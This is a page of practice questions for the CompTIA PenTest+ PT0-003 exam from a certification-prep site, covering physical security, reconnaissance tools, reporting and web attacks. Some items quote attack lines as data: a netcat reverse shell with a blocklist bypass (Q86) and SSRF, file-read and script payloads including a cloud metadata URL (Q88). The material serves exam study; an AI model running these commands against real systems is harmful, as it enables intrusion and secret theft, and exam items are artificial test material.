Spring Sale Limited Time 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: simple70

Pass the CompTIA PenTest+ PT0-003 Questions and answers with CertsForce

Viewing page 9 out of 9 pages
Viewing questions 81-90 out of questions
Questions # 81:

Which of the following can an access control vestibule help deter?

Options:

A.

USB drops


B.

Badge cloning


C.

Lock picking


D.

Tailgating


Expert Solution
Questions # 82:

During host discovery, a security analyst wants to obtain GeoIP information and a comprehensive summary of exposed services. Which of the following tools is best for this task?

Options:

A.

WiGLE.net


B.

WHOIS


C.

theHarvester


D.

Censys.io


Expert Solution
Questions # 83:

During an assessment, a penetration tester obtains access to an internal server and would like to perform further reconnaissance by capturing LLMNR traffic. Which of the following tools should the tester use?

Options:

A.

Burp Suite


B.

Netcat


C.

Responder


D.

Nmap


Expert Solution
Questions # 84:

Which of the following is within the scope of proper handling and most crucial when working on a penetration testing report?

Options:

A.

Keeping both video and audio of everything that is done


B.

Keeping the report to a maximum of 5 to 10 pages in length


C.

Basing the recommendation on the risk score in the report


D.

Making the report clear for all objectives with a precise executive summary


Expert Solution
Questions # 85:

Which of the following methods should a physical penetration tester employ to access a rarely used door that has electronic locking mechanisms?

Options:

A.

Lock picking


B.

Impersonating


C.

Jamming


D.

Tailgating


E.

Bypassing


Expert Solution
Questions # 86:

A penetration tester is trying to bypass a command injection blocklist to exploit a remote code execution vulnerability. The tester uses the following command:

nc -e /bin/sh 10.10.10.16 4444

Which of the following would most likely bypass the filtered space character?

Options:

A.

${IFS}


B.

%0a


C.

+ *


D.

%20


Expert Solution
Questions # 87:

SIMULATION

Using the output, identify potential attack vectors that should be further investigated.

Question # 87

Question # 87

Question # 87

Question # 87

Question # 87


Expert Solution
Questions # 88:

A penetration tester has found a web application that is running on a cloud virtual machine instance. Vulnerability scans show a potential SSRF for the same application URL path with an injectable parameter. Which of the following commands should the tester run to successfully test for secrets exposure exploitability?

Options:

A.

curl ?param=http://169.254.169.254/latest/meta-data/


B.

curl '?param=http://127.0.0.1/etc/passwd '


C.

curl '?param=<script>alert(1)<script>/'


D.

curl ?param=http://127.0.0.1/


Expert Solution
Questions # 89:

A penetration tester completed OSINT work and needs to identify all subdomains for mydomain.com. Which of the following is the best command for the tester to use?

Options:

A.

nslookup mydomain.com » /path/to/results.txt


B.

crunch 1 2 | xargs -n 1 -I 'X' nslookup X.mydomain.com


C.

dig @8.8.8.8 mydomain.com ANY » /path/to/results.txt


D.

cat wordlist.txt | xargs -n 1 -I 'X' dig X.mydomain.com


Expert Solution
Viewing page 9 out of 9 pages
Viewing questions 81-90 out of questions